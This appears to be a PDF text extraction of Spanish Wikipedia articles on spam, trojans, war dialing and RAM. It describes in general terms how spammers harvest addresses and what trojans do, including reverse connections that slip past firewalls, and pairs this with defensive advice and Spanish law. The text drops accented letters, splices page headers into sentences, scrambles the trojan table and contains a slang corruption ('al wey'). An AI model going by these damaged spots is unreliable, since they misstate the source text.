Los spammers (individuos o empresas que envan correo no deseado) utilizan diversas tcnicas para conseguir las largas listas de direcciones de correo que necesitan para su actividad, generalmente a travs de robots o programas automticos que recorren internet en busca de direcciones. Algunas de las principales fuentes de direcciones para luego enviar el correo basura son: Los propios sitios web, que con frecuencia contienen la direccin de su creador, o de sus visitantes (en foros, blogs, etc.).[] Los grupos de noticias de usenet, cuyos mensajes suelen incluir la direccin del remitente. Listas de correo: les basta con apuntarse e ir anotando las direcciones de sus usuarios. Correos electrnicos con chistes, cadenas, etc. que los usuarios de internet suelen reenviar sin ocultar las direcciones, y que pueden llegar a acumular docenas de direcciones en el cuerpo del mensaje, pudiendo ser capturadas por un troyano o, ms raramente, por un usuario malicioso. Pginas en las que se solicita tu direccin de correo (o la de "tus amigos" para enviarles la pgina en un correo) para acceder a un determinado servicio o descarga.[] Bases de datos WHOIS. Entrada ilegal en servidores.

Spam Por ensayo y error: se generan aleatoriamente direcciones, y se comprueba luego si han llegado los mensajes. Un mtodo habitual es hacer una lista de dominios, y agregarles "prefijos" habituales. Por ejemplo, para el dominio wikipedia.org, probar info@wikipedia.org, webmaster@wikipedia.org, staff@wikipedia.org, etc.[]

110

Envo de los mensajes


Una vez que tienen una gran cantidad de direcciones de correo vlidas (en el sentido de que existen), los spammers utilizan programas que recorren la lista enviando el mismo mensaje a todas las direcciones. Esto supone un costo mnimo para ellos, pero perjudica al receptor (prdidas econmicas y de tiempo) y en general a Internet, por consumirse gran parte del ancho de banda en mensajes basura.

Verificacin de la recepcin
Adems, es frecuente que el remitente de correo basura controle qu direcciones funcionan y cules no por medio de web bugs o pequeas imgenes o similares contenidas en el cdigo HTML del mensaje. De esta forma, cada vez que alguien lee el mensaje, su ordenador solicita la imagen al servidor de susodicho remitente, que registra automticamente el hecho. Son una forma ms de spyware. Otro sistema es el de prometer en los mensajes que enviando un mensaje a una direccin se dejar de recibirlos: cuando alguien contesta, significa no slo que lo ha abierto, sino que lo ha ledo.

Ciclo del SPAM (1): Sitio web de Spammers (2): Spammer (3): Spamware (4): ordenadores infectados (5): Virus o troyanos (6): Servidores de correo (7): Usuarios (8): Trfico Web.

Troyanos y ordenadores zombis


Recientemente, han empezado a utilizar una tcnica mucho ms perniciosa: la creacin de virus troyanos que se expanden masivamente por ordenadores no protegidos (sin cortafuegos). As, los ordenadores infectados son utilizados por el remitente de correo masivo como "ordenadores zombis", que envan correo basura a sus rdenes, pudiendo incluso rastrear los discos duros o correos nuevos (sobre todo cadenas) en busca de ms direcciones. Esto puede causar perjuicios al usuario que ignora haber sido infectado (que no tiene por qu notar nada extrao), al ser identificado como spammer por los servidores a los que enva spam sin saberlo, lo que puede conducir a que no se le deje acceder a determinadas pginas o servicios. As, con la potencia de clculo de todos los ordenadores infectados, pueden mandar el spam fcilmente sin que se enteren los propios usuarios, y pueden incluso mandar un virus al ordenador de una empresa importante. Actualmente, el 40% de los mensajes no deseados se envan de esta forma.

Spam

111

Servidores de correo mal configurados


Los servidores de correo mal configurados son aprovechados tambin por los remitentes de correo no deseado. En concreto los que estn configurados como Open Relay. Estos no necesitan un usuario y contrasea para que sean utilizados para el envo de correos electrnicos. Existen diferentes bases de datos pblicas que almacenan los ordenadores que conectados directamente a Internet permiten su utilizacin por susodichos remitemtes. El ms conocido es la Open Relay DataBase.

Medidas para evitar correo no deseado


A pesar que no existen tcnicas infalibles para protegerse del correo basura, los expertos en seguridad informtica recomiendan una serie de acciones para reducir la cantidad de correo electrnico no deseado: Usar una imagen para la direccin de correo electrnico. En vez de poner el enlace a tu cuenta, usa una redireccin (puede ser temporal o por un nmero de usos), y brrala cuando recibas excesivos mensajes no deseados. Modificar la direccin para evitar el rastreo automtico. En los grupos de noticias y listas de correo: No poner el remitente verdadero en las publicaciones enviados. Si el archivo de mensajes a la lista es visible desde web, cambiar las direcciones de remite por una imagen, ocultarlas, o escribirlas de forma que sea difcil reconocerla como tal para un programa. Para evitar correo no deseado en una lista: El foro puede estar moderado, para evitar mensajes inadecuados. Rechazar correos de usuarios no suscritos a la lista. Utilizar la clave del correo exclusivamente para ste. no utilizarla en ninguna otra pgina.

Proyectos y servicios contra el correo basura


SPF: Tecnologa creada para verificar que los remitentes de los mensajes de correo son quienes dicen ser. DomainKeys: Otra tecnologa que sirve para lo mismo que SPF y que adems asegura que los emails no han sido modificados. SenderID:[14] Tecnologa de Microsoft que pretende competir con SPF, incluso utilizando esas mismas siglas para una tecnologa que en la prctica es distinta.[15] En realidad SenderID utiliza consultas DNS parecidas a SPF slo como primer paso de su proceso,[16] que involucra tambin filtros antispam basados en contenido. SenderID ha sido adoptado por hotmail.[17] En la prctica esto obliga a adoptar esta tecnologa o verse Cartel anti SPAM. excluido de esas direcciones,[18] que suponen unos 260 millones de usuarios en todo el mundo.[19] No obstante, los resultados de su tecnologa, y/o otras medidas paralelas adoptadas, estn causando serios problemas en dominios enteros en todo el mundo.[20][21] Proyectos como el proyecto Harvester y el emailharvest recopilan IPs de spammers para bloquearlas mediante una trampa. Ponen direcciones de correo que indican la direccin del remitente de correo masivo y cuando l enva un mensaje a esa direccin se sabe desde qu direccin fue capturada, con lo que puede filtrar al remitente. Redirecciones temporales.

Spam

112

Legislacin
En Espaa el correo electrnico no solicitado est terminantemente prohibido por la Ley de Servicios de la Sociedad de la Informacin y de Comercio Electrnico (LSSICE), publicada en el BOE del 12 de julio de 2002, salvo lo dispuesto en el art. 19.2. "En todo caso, ser de aplicacin la Ley Orgnica 15/1999, de 13 de diciembre, de Proteccin de Datos de Carcter Personal, y su normativa de desarrollo, en especial, en lo que se refiere a la obtencin de datos personales, la informacin a los interesados y la creacin y mantenimiento de ficheros de datos personales." De hecho, las sentencias en Espaa referidas al correo electrnico no solicitado estn relacionadas con esta ley; sin embargo, dicha ley no hace mencin de la palabra "Spam", sino al nombre "comunicaciones comerciales enviadas por medios electrnicos". En Estados Unidos se promulg la ley CAN-SPAM, que ha sido prcticamente inefectiva.

Espaa
En Espaa es posible la denuncia del correo masivo ante la Agencia Espaola de Proteccin de Datos que es la competente para perseguirlo, en caso que el correo basura sea de origen espaol. Esta prctica est sancionada en el el Art.19.2 que dispone que a todo lo referente al envo de comunicaciones electrnicas ser aplicable la LOPD y el artculo 21 de la Ley 34/2002, de 11 de Julio de Servicios de la Sociedad de Informacin y Comercio Electrnico (LSSI) que dispone: Prohibicin de comunicaciones comerciales realizadas a travs de correo electrnico o medios de comunicacin electrnica equivalentes. 1. Queda prohibido el envo de comunicaciones publicitarias o promocionales por correo electrnico u otro medio de comunicacin electrnica equivalente que previamente no hubieran sido solicitadas o expresamente autorizadas por los destinatarios de las mismas. 2. Lo dispuesto en el apartado anterior no ser de aplicacin cuando exista una relacin contractual previa, siempre que el prestador hubiera obtenido de forma lcita los datos de contacto del destinatario y los empleara para el envo de comunicaciones comerciales referentes a productos o servicios de su propia empresa que sean similares a los que inicialmente fueron objeto de contratacin con el cliente. En todo caso, el prestador deber ofrecer al destinatario la posibilidad de oponerse al tratamiento de sus datos con fines promocionales mediante un procedimiento sencillo gratuito, tanto en el momento de recogida de los datos como en cada una de las comunicaciones comerciales que le dirija. El rgimen sancionador de la LSSI clasifica las infracciones por SPAM en: Infracciones graves: ... c) El envo masivo de comunicaciones comerciales por correo electrnico u otro medio de comunicacin electrnica equivalente o el envo, en el plazo de un ao, de ms de tres comunicaciones comerciales por los medios aludidos a un mismo destinatario, cuando en dichos envos no se cumplan los requisitos establecidos en el artculo 21. Infracciones leves: ... d) El envo de comunicaciones comerciales por correo electrnico u otro medio de comunicacin electrnica equivalente cuando en dichos envos no se cumplan los requisitos establecidos en el artculo 21 y no constituya infraccin grave. Y finalmente dispone las sanciones siguientes: Artculo 39. Sanciones. 1. Por la comisin de las infracciones recogidas en el artculo anterior, se impondrn las siguientes sanciones: a) Por la comisin de infracciones muy graves, multa de 150.001 hasta 600.000 euros. b)

Spam Por la comisin de infracciones graves, multa de 30.001 hasta 150.000 euros. c) Por la comisin de infracciones leves, multa de hasta 30.000 euros. Artculo 45. Prescripcin, respecto a la prescripcin de las infracciones: Las infracciones muy graves prescribirn a los tres aos, las graves a los dos aos y las leves a los seis meses, las sanciones impuestas por faltas muy graves prescribirn a los tres aos, las impuestas por faltas graves a los dos aos y las impuestas por faltas leves al ao.

113

Referencias
[1] (http:/ / science. howstuffworks. com/ innovation/ edible-innovations/ spam-food2. htm) [2] (http:/ / www. businessweek. com/ articles/ 2012-05-17/ how-spam-meat-has-survived-spam-e-mail) [3] Informacin del trmino spam en foros (http:/ / www. todopsp. com/ foros/ showthread. php?t=22910) [4] Reaction to the DEC Spam of 1978 (http:/ / www. templetons. com/ brad/ spamreact. html) (en ingls) [5] Monty Python's Flying Circus, BBC, 2nd. series, episodio 25 (15 de diciembre de 1970). Segn [6] Brad Templeton: Origin of the term "spam" to mean net abuse (http:/ / www. templetons. com/ brad/ spamterm. html), citado por Mansilla. [7] Akismet (http:/ / www. akismet. com/ ) [8] Informe de Retarus sobre spam en junio del 2008: "Viagra" supera a "Rolex" (http:/ / ivr. tmcnet. com/ news/ 2008/ 07/ 03/ 3529512. htm) [9] Say good bye to viagra, rolex and other unwanted bogus emails... (http:/ / www. spamsafemail. com/ index. html) [10] Avalanche of Viagra ads and Rolex pitches (http:/ / dir. salon. com/ story/ tech/ feature/ 2005/ 01/ 19/ microsoft_spam/ index. html) [11] Recent upsurge in Rolex spam (http:/ / www. well. com/ conf/ inkwell. vue/ topics/ 236/ Brian-McWilliams-Spam-Kings-page02. html) [12] VIAGRA AND ROLEX WATCHES JUNK E-MAILS! (http:/ / www. combat-diaries. co. uk/ diary30/ spam viagra, rolex. htm) [13] Informacin del trmino spam en foros (http:/ / www. todopsp. com/ foros/ showthread. php?t=22910) [14] Microsoft Sender ID Home Page (http:/ / www. microsoft. com/ mscorp/ safety/ technologies/ senderid/ default. mspx) [15] Is SPF the same thing as Sender ID? (http:/ / www. openspf. org/ SPF_vs_Sender_ID) [16] Sender ID Framework Overview (http:/ / www. microsoft. com/ mscorp/ safety/ technologies/ senderid/ overview. mspx) [17] Sender ID Framework Reaches Tipping Point (https:/ / www. microsoft. com/ presspass/ press/ 2007/ apr07/ 04-18SenderIDPR. mspx) [18] Use Sender ID or we'll junk you, says Microsoft (http:/ / www. silicon. com/ research/ specialreports/ thespamreport/ 0,39025001,39131378,00. htm?r=1) [19] live.com: We Heard You Loud and Clear (http:/ / mailcall. spaces. live. com/ blog/ cns!CC9301187A51FE33!29123. entry) [20] Hotmail's antispam measures snuff out legit emails, too (http:/ / www. theregister. com/ 2007/ 05/ 01/ hotmail_friendly_fire/ ) [21] Admins accuse Microsoft of Draconian Hotmail cap (http:/ / www. theregister. com/ 2007/ 10/ 09/ limits_on_hotmail/ )

Bibliografa
Sanz, J. (np). Evaluacin de alternativas para reducir el spam (http://www.rediris.es/mail/abuso/doc/ MedidasAntiSPam.pdf). RedIRIS. pp.15. Consultado el 4 de junio de 2010.

Enlaces externos
Wikimedia Commons alberga contenido multimedia sobre Spam. Commons Legislacin en Espaa: Ley 56/2007, de 28 de diciembre, de Medidas de Impulso de la Sociedad de la Informacin (http://noticias. juridicas.com/base_datos/Admin/l56-2007.html) Ley 34/2002, de 11 de julio, de Servicios de la Sociedad de la Informacin y de Comercio Electrnico (http:// noticias.juridicas.com/base_datos/Admin/l34-2002.html) Agencia Espaola de Proteccin de Datos (http://www.agpd.es) The Web Bug FAQ (http://www.eff.org/Privacy/Marketing/web_bug.html) Breve manual sobre el spam (http://www.telefonica.net/web2/jamj/dat/manual.pdf) Noticia que comenta el envo masivo de correo postal a Alan Ralsky, el rey del SPAM (http://www.hispasec. com/unaaldia/1639) Entrevista a un spammer (http://www.washingtonpost.com/wp-dyn/content/article/2006/02/14/ AR2006021401342.html), en The Washington Post (en ingls)

Troyano (informtica)

114

Troyano (informtica)
En informtica,se denomina troyano o caballo de Troya (traduccin literal del ingls Trojan horse) a un software malicioso que se presenta al usuario como un programa aparentemente legtimo e inofensivo pero al ejecutarlo ocasiona daos.[][] El trmino troyano proviene de la historia del caballo de Troya mencionado en la Odisea de Homero. Los troyanos pueden realizar diferentes tareas, pero, en la mayora de los casos crean una puerta trasera (en ingls backdoor) que permite la administracin remota a un usuario no autorizado.[1]

Captura de pantalla del troyano Nuclear RAT

Un troyano no es de por s, un virus informtico,an cuando tericamente pueda ser distribuido y funcionar como tal. La diferencia fundamental entre un troyano y un virus, consiste en su finalidad. Para que un programa sea un "troyano" slo tiene que acceder y controlar la mquina anfitriona sin ser advertido, normalmente bajo una apariencia inocua. Al contrario que un virus, que es un husped destructivo, el troyano no necesariamente provoca daos porque no es su objetivo.

Evolucin histrica
Los troyanos se concibieron como una herramienta para causar el mayor dao posible en el equipo infectado. En los ltimos aos y gracias al mayor uso de Internet, esta tendencia ha cambiado hacia el robo de datos bancarios o informacin personal.[] Desde sus orgenes, los troyanos han sido utilizados como arma de sabotaje por los servicios de inteligencia como la CIA, cuyo caso ms emblemtico fue el Sabotaje al Gasoducto Siberiano en 1982. La CIA instal un troyano en el software que se ocupara de manejar el funcionamiento del gasoducto, antes de que la URSS comprara ese software en Canad.[2] De acuerdo con un estudio de la empresa responsable del software de seguridad BitDefender desde enero hasta junio de 2009, "El nmero de troyanos est creciendo, representan el 83% del malware detectado".[3] La siguiente grfica muestra el porcentaje de malware que representan los troyanos:[citarequerida]

Troyano (informtica)

115

Propsitos de los troyanos


Los troyanos estn diseados para permitir a un individuo el acceso remoto a un sistema. Una vez ejecutado el troyano, el individuo puede acceder al sistema de forma remota y realizar diferentes acciones sin necesitar permiso.[4] Las acciones que el individuo puede realizar en el equipo remoto, dependen de los privilegios que tenga el usuario en el ordenador remoto y de las caractersticas del troyano.[citarequerida] Algunas de las operaciones que se pueden llevar a cabo en el ordenador remoto son: Utilizar la mquina como parte de una botnet (por ejemplo para realizar ataques de denegacin de servicio o envo de spam). Instalacin de otros programas (incluyendo otros programas maliciosos). Robo de informacin personal: informacin bancaria, contraseas, cdigos de seguridad. Borrado, modificacin o transferencia de archivos (descarga o subida). Ejecutar o terminar procesos. Apagar o reiniciar el equipo. Monitorizar las pulsaciones del teclado. Realizar capturas de pantalla. Ocupar el espacio libre del disco duro con archivos intiles. Monitorizacin del sistema y seguimiento de las acciones del usuario. Miscelnea (acciones "graciosas" tales como expulsar la unidad de cd, cambiar apariencia del sistema, etc.) Hoy en da, dada la popularizacin de los sistemas para dispositivos mviles y tablets, especialmente aquellos con menor control en su marketplace de aplicaciones (como Android) son foco de creciente inters para los desarrolladores de este tipo de malware. En el caso de estos dispositivos, las acciones que un atacante puede llegar a realizar son similares a las anteriores pero dada la naturaleza del dispositivo, el abanico de opciones se amplia: Captura de mensajes de texto entrantes y salientes. Captura del registro de llamadas. Habilidad para acceder (consultar, eliminar y modificar) la agenda de contactos. Habilidad para efectuar llamadas y enviar SMS. Conocimiento de la posicin geogrfica del dispositivo mediante GPS. Captura de la cmara. Y un largo etc.

Caractersticas de los troyanos


Los troyanos estn compuestos principalmente por dos programas: un cliente, que enva las rdenes que se deben ejecutar en la computadora infectada, un servidor situado en la computadora infectada, que recibe las rdenes del cliente, las ejecuta y casi siempre devuelve un resultado al programa cliente y, por ltimo, un editor del servidor, el cual sirve para modificarlo, protegerlo mediante contraseas, unirlo a otros programas para que, al abrir el programa tambin se ejecute el servidor, configurar en que puerto deseamos instalar el servidor, etc. Atendiendo a la forma en la que se realiza la conexin entre el cliente y el servidor se pueden clasificar en: Conexin directa (el cliente se conecta al servid). Conexin inversa (el servidor se conecta al wey). La conexin inversa tiene claras ventajas sobre la conexin directa, esta traspasa algunos firewalls (la mayora de los firewall no analizan los paquetes que salen de la computadora, pero que s analizan los que entran), pueden ser usados en redes situadas detrs de un router sin problemas (no es necesario redirigir los puertos) y no es necesario conocer la direccin IP del servidor.[citarequerida] Cabe destacar que existen otro tipo de conexiones, que no son de equipo vctima a equipo atacante, sino que utilizan un servidor intermedio, normalmente ajeno a ambos, para realizar el proceso de control. Se suele utilizar para este

Troyano (informtica) propsito el protocolo IRC o incluso FTP, HTTP u otros.[citarequerida]

116

Formas de infectarse con troyanos


La mayora de infecciones con troyanos ocurren cuando se ejecuta un programa infectado con un troyano. Estos programas pueden ser de cualquier tipo, desde instaladores hasta presentaciones de fotos. Al ejecutar el programa, este se muestra y realiza las tareas de forma normal, pero en un segundo plano y al mismo tiempo se instala el troyano. El proceso de infeccin no es visible para el usuario ya que no se muestran ventanas ni alertas de ningn tipo. Evitar la infeccin de un troyano es difcil, algunas de las formas ms comunes de infectarse son: Descarga de programas de redes P2P. Pginas web que contienen contenido ejecutable (por ejemplo controles ActiveX o aplicaciones Java). Exploits para aplicaciones no actualizadas (navegadores, reproductores multimedia, clientes de mensajera instantnea). Ingeniera social (por ejemplo un cracker manda directamente el troyano a la vctima a travs de la mensajera instantnea). Archivos adjuntos en correos electrnicos y archivos enviados por mensajera instantnea. Debido a que cualquier programa puede realizar acciones maliciosas en un ordenador, hay que ser cuidadoso a la hora de ejecutarlos. Estos pueden ser algunos buenos consejos para evitar infecciones: Disponer de un programa antivirus actualizado regularmente para estar protegido contra las ltimas amenazas. Disponer de un firewall correctamente configurado. Algunos antivirus lo traen integrado. Tener instalados los ltimos parches y actualizaciones de seguridad del sistema operativo. Descargar los programas siempre de las pginas web oficiales o de pginas web de confianza. No abrir los datos adjuntos de un correo electrnico si no conoces al remitente. Evitar la descarga de software de redes p2p.

Eliminacin de troyanos
Una de las principales caractersticas de los troyanos, es que no son visibles para el usuario. Un troyano puede estar ejecutndose en un ordenador durante meses sin que el usuario perciba nada. Esto hace muy difcil su deteccin y eliminacin de forma manual. Algunos patrones para identificarlos son: un programa desconocido se ejecuta al iniciar el ordenador, se crean o borran archivos de forma automtica, el ordenador funciona ms lento de lo normal, errores en el sistema operativo. Por otro lado los programas antivirus estn diseados para eliminar todo tipo de software malicioso, adems de eliminarlos tambin previenen de nuevas infecciones actuando antes de que el sistema resulte infectado. Es muy recomendable tener siempre un antivirus instalado en el equipo y a ser posible tambin un firewall.

Troyanos ms famosos

Troyano (informtica)

117

Nombre NetBus Back Orifice

Autor

Ao

Conexin Directa Indirecta Directa Directa

Lenguaje

Carl-Fredrik Neikte 1997 Sir Dystic 1998 1999 1999

Back Orifice 2000 Dildog Sub7 KaoS Bifrost Bandook Poison Ivy MobMan xKaoS27x KSV Princeali Shapeless

2011 / 2012 Directa / Inversa Espaol 2004 2005 2007 Directa / Inversa Directa / Inversa C++ Inversa

Los ms peligrosos entre estos grupos: The KaoS de xKaoS27x y Poison Ivy de Shapeless, estos virus, son muy difciles de poder detectarlos, incluso algunos antivirus no lo pueden detectar, son mayoritariamente encontrados en sistemas, Windows y Mac Os. Descripcin de la anterior tabla: Conexin directa: es manipular el software malicioso cuando el computador este encendido, se requiere una ignicin desde la vctima y despus, una conexin de manejo para poder manejar el software malicioso. Conexin inversa: es manipular el software malicioso por activacin automtica por parte del mismo, este se conecta al host que manipula el software, y el host empieza a hacer acciones con el software malicioso. Conexin mediante servidor intermedio: es manipular el software malicioso a travs de un servidor intermedio, que acta como proxy entre cliente y servidor, permitiendo saltar routers y firewalls

Referencias Enlaces externos


Carnegie Mellon University (1999). CERT Advisory CA-1999-02 Trojan Horses (http://www.cert.org/ advisories/CA-1999-02.html) (en ingls). Consultado el 26/05de 2010.

War dialing

118

War dialing
Se conoce como war dialing o demon dialing (en ingls) a una tcnica utilizada durante las dcadas de los aos 1980 y 1990, que consista en hacer llamadas a una serie de nmeros de telfono automticamente con el fin de encontrar mdems conectados y permitiendo la conexin con algn otro ordenador. El trmino utilizado originalmente para denominar a esta tcnica era daemon dialing, pero debido a su constante mencin en la pelcula WarGames como war dialing, ste ltimo pas a ser el ms utilizado. Esta prctica se llevaba a cabo normalmente con el programa ToneLoc para MS-DOS. Hoy en da est en desuso debido a las interconexiones ofrecidas por los proveedores de acceso a Internet.

Memoria de acceso aleatorio


La memoria de acceso aleatorio (en ingls: random-access memory) se utiliza como memoria de trabajo para el sistema operativo, los programas y la mayora del software. Es all donde se cargan todas las instrucciones que ejecutan el procesador y otras unidades de cmputo. Se denominan de acceso aleatorio porque se puede leer o DIMM normal y corriente de memoria RAM tipo DDR3 de 240 contactos. escribir en una posicin de memoria con un tiempo de espera igual para cualquier posicin, no siendo necesario seguir un orden para acceder a la informacin de la manera ms rpida posible. Durante el encendido del computador, la rutina POST verifica que los mdulos de memoria RAM estn conectados de manera correcta. En el caso que no existan o no se detecten los mdulos, la mayora de tarjetas madres emiten una serie de pitidos que indican la ausencia de memoria principal. Terminado ese proceso, la memoria BIOS puede realizar un test bsico sobre la memoria RAM indicando fallos mayores en la misma.

Nomenclatura
La expresin memoria RAM se utiliza frecuentemente para describir a los mdulos de memoria utilizados en los computadores personales y servidores. En el sentido estricto, esta memoria es solo una variedad de la memoria de acceso aleatorio: las ROM, memorias Flash, cach (SRAM), los registros en procesadores y otras unidades de procesamiento tambin poseen la cualidad de presentar retardos de acceso iguales para cualquier posicin. Los mdulos de RAM son la presentacin comercial de este tipo de memoria, que se compone de circuitos integrados soldados sobre un circuito impreso independiente, en otros dispositivos como las consolas de videojuegos, la RAM va soldada directamente sobre la placa principal.

Memoria de acceso aleatorio

119

Historia
Uno de los primeros tipos de memoria RAM fue la memoria de ncleo magntico, desarrollada entre 1949 y 1952 y usada en muchos computadores hasta el desarrollo de circuitos integrados a finales de los aos 60 y principios de los 70. Esa memoria requera que cada bit estuviera almacenado en un toroide de material ferromgnetico de algunos milmetros de dimetro, lo que resultaba en dispositivos con una capacidad de memoria muy pequea. Antes que eso, las computadoras usaban rels y lneas de retardo de varios tipos construidas para implementar las funciones de memoria principal con o sin acceso aleatorio. En 1969 fueron lanzadas una de las primeras memorias RAM basadas en semiconductores de silicio por parte de Intel con el integrado 3101 de 64 bits de memoria y para el siguiente ao se present una memoria DRAM de 1024 bytes, referencia 1103 que se constituy en un hito, ya que fue la primera en ser comercializada con xito, lo que signific el principio del fin para las memorias de ncleo magntico. En comparacin con los integrados de memoria DRAM actuales, la 1103 es primitiva en varios aspectos, pero tena un desempeo mayor que la memoria de ncleos.
Integrado de silicio de 64 bits sobre un sector de memoria de ncleo magntico (finales de los 60).

En 1973 se present una innovacin que integrados de memoria DRAM estn agrupados arriba a derecha e izquierda. permiti otra miniaturizacin y se convirti en estndar para las memorias DRAM: la multiplexacin en tiempo de la direcciones de memoria. MOSTEK lanz la referencia MK4096 de 4096 bytes en un empaque de 16 pines,[1] mientras sus competidores las fabricaban en el empaque DIP de 22 pines. El esquema de direccionamiento[2] se convirti en un estndar de facto debido a la gran popularidad que logr esta referencia de DRAM. Para finales de los 70 los integrados eran usados en la mayora de computadores Mdulos de memoria tipo SIPP instalados directamente sobre la placa base. nuevos, se soldaban directamente a las placas base o se instalaban en zcalos, de manera que ocupaban un rea extensa de circuito impreso. Con el tiempo se hizo obvio que la instalacin de RAM sobre el

4MiB de memoria RAM para un computador VAX de finales de los 70. Los

Memoria de acceso aleatorio impreso principal, impeda la miniaturizacin , entonces se idearon los primeros mdulos de memoria como el SIPP, aprovechando las ventajas de la construccin modular. El formato SIMM fue una mejora al anterior, eliminando los pines metlicos y dejando unas reas de cobre en uno de los bordes del impreso, muy similares a los de las tarjetas de expansin, de hecho los mdulos SIPP y los primeros SIMM tienen la misma distribucin de pines. A finales de los 80 el aumento en la velocidad de los procesadores y el aumento en el ancho de banda requerido, dejaron rezagadas a las memorias DRAM con el esquema original MOSTEK, de manera que se realizaron una serie de mejoras en el direccionamiento como las siguientes: FPM-RAM (Fast Page Mode RAM) Inspirado en tcnicas como el "Burst Mode" usado en procesadores como el Intel 486,[3] se implant un modo direccionamiento en el que el controlador de memoria enva una sola direccin y recibe a cambio esa y varias consecutivas sin necesidad de generar todas las direcciones. Esto supone un ahorro de tiempos ya que ciertas operaciones son repetitivas cuando se desea acceder a muchas posiciones consecutivas. Funciona como si deseramos visitar todas las casas en una calle: despus de la primera vez no seria necesario decir el nmero de la calle nicamente seguir la misma. Se fabricaban con tiempos de acceso de 70 60 ns y fueron muy populares en sistemas basados en el 486 y los primeros Pentium. EDO-RAM (Extended Data Output RAM)

120

Mdulos formato SIMM de 30 y 72 pines, los ltimos fueron utilizados con integrados tipo EDO-RAM.

Lanzada en 1995 y con tiempos de accesos de 40 o 30 ns supona una mejora sobre su antecesora la FPM. La EDO, tambin es capaz de enviar direcciones contiguas pero direcciona la columna que va utilizar mientras que se lee la informacin de la columna anterior, dando como resultado una eliminacin de estados de espera, manteniendo activo el bffer de salida hasta que comienza el prximo ciclo de lectura. BEDO-RAM (Burst Extended Data Output RAM) Fue la evolucin de la EDO RAM y competidora de la SDRAM, fue presentada en 1997. Era un tipo de memoria que usaba generadores internos de direcciones y acceda a ms de una posicin de memoria en cada ciclo de reloj, de manera que lograba un desempeo un 50% mejor que la EDO. Nunca sali al mercado, dado que Intel y otros fabricantes se decidieron por esquemas de memoria sincrnicos que si bien tenan mucho del direccionamiento MOSTEK, agregan funcionalidades distintas como seales de reloj.

Tecnologas de memoria
La tecnologa de memoria actual usa una seal de sincronizacin para realizar las funciones de lectura-escritura de manera que siempre esta sincronizada con un reloj del bus de memoria, a diferencia de las antiguas memorias FPM y EDO que eran asncronas. Hace ms de una dcada toda la industria se decant por las tecnologas sncronas, ya que permiten construir integrados que funcionen a una frecuencia superior a 66 MHz. Tipos de DIMMs segn su cantidad de Contactos o Pines: 72-pin SO-DIMM (no el mismo que un 72-pin SIMM), usados por FPM DRAM y EDO DRAM 100-pin DIMM, usados por printer SDRAM 144-pin SO-DIMM, usados por SDR SDRAM 168-pin DIMM, usados por SDR SDRAM (menos frecuente para FPM/EDO DRAM en reas de trabajo y/o servidores) 172-pin MicroDIMM, usados por DDR SDRAM

Memoria de acceso aleatorio 184-pin DIMM, usados por DDR SDRAM 200-pin SO-DIMM, usados por DDR SDRAM y DDR2 SDRAM 204-pin SO-DIMM, usados por DDR3 SDRAM 240-pin DIMM, usados por DDR2 SDRAM, DDR3 SDRAM y FB-DIMM DRAM 244-pin MiniDIMM, usados por DDR2 SDRAM

121

SDR SDRAM
Memoria sncrona, con tiempos de acceso de entre 25 y 10 ns y que se presentan en mdulos DIMM de 168 contactos. Fue utilizada en los Pentium II y en los Pentium III , as como en los AMD K6, AMD Athlon K7 y Duron. Est muy extendida la creencia de que se llama SDRAM a secas, y que la denominacin SDR SDRAM es para diferenciarla de la memoria DDR, pero no Memorias RAM con tecnologas usadas en la actualidad. es as, simplemente se extendi muy rpido la denominacin incorrecta. El nombre correcto es SDR SDRAM ya que ambas (tanto la SDR como la DDR) son memorias sncronas dinmicas. Los tipos disponibles son: PC66: SDR SDRAM, funciona a un mx de 66,6 MHz. PC100: SDR SDRAM, funciona a un mx de 100 MHz. PC133: SDR SDRAM, funciona a un mx de 133,3 MHz.

RDRAM
Se presentan en mdulos RIMM de 184 contactos. Fue utilizada en los Pentium IV . Era la memoria ms rpida en su tiempo, pero por su elevado costo fue rpidamente cambiada por la econmica DDR. Los tipos disponibles son: PC600: RIMM RDRAM, funciona a un mximo de 300 MHz. PC700: RIMM RDRAM, funciona a un mximo de 356 MHz. PC800: RIMM RDRAM, funciona a un mximo de 400 MHz. PC1066: RIMM RDRAM, funciona a un mximo de 533 MHz.

DDR SDRAM
Memoria sncrona, enva los datos dos veces por cada ciclo de reloj. De este modo trabaja al doble de velocidad del bus del sistema, sin necesidad de aumentar la frecuencia de reloj. Se presenta en mdulos DIMM de 184 contactos en el caso de ordenador de escritorio y en mdulos de 144 contactos para los ordenadores porttiles. Los tipos disponibles son: PC1600 o DDR 200: funciona a un mx de 200 MHz. PC2100 o DDR 266: funciona a un mx de 266,6 MHz. PC2700 o DDR 333: funciona a un mx de 333,3 MHz. PC3200 o DDR 400: funciona a un mx de 400 MHz. PC4500 o DRR 500: funciona a una mx de 500 MHz

Memoria de acceso aleatorio

122

DDR2 SDRAM
Las memorias DDR 2 son una mejora de las memorias DDR (Double Data Rate), que permiten que los bferes de entrada/salida trabajen al doble de la frecuencia del ncleo, permitiendo que durante cada ciclo de reloj se realicen cuatro transferencias. Se presentan en mdulos DIMM de 240 contactos. Los tipos disponibles son: PC2-4200 o DDR2-533: funciona a un mx de 533,3 MHz. PC2-5300 o DDR2-667: funciona a un mx de 666,6 MHz. PC2-6400 o DDR2-800: funciona a un mx de 800 MHz. PC2-8600 o DDR2-1066: funciona a un mx de 1066,6 MHz.

Mdulos de memoria instalados de 256 MiB cada uno en un sistema con doble canal.

PC2-9000 o DDR2-1200: funciona a un mx de 1200 MHz

DDR3 SDRAM
Las memorias DDR 3 son una mejora de las memorias DDR 2, proporcionan significantes mejoras en el rendimiento en niveles de bajo voltaje, lo que lleva consigo una disminucin del gasto global de consumo. Los mdulos DIMM DDR 3 tienen 240 pines, el mismo nmero que DDR 2; sin embargo, los DIMMs son fsicamente incompatibles, debido a una ubicacin diferente de la muesca. Los tipos disponibles son: PC3-6400 o DDR3-800: funciona a un mx de 800 MHz. PC3-8500 o DDR3-1066: funciona a un mx de 1066,6 MHz. PC3-10600 o DDR3-1333: funciona a un mx de 1333,3 MHz. PC3-12800 o DDR3-1600: funciona a un mx de 1600 MHz. PC3-14900 o DDR3-1866: funciona a un mx de 1866,6 MHz. PC3-17000 o DDR3-2133: funciona a un mx de 2133,3 MHz. PC3-19200 o DDR3-2400: funciona a un mx de 2400 MHz. PC3-21300 o DD3-2666: funciona a un mx de 2666,6 MHz.

Memoria de acceso aleatorio

123

Mdulos de la memoria RAM


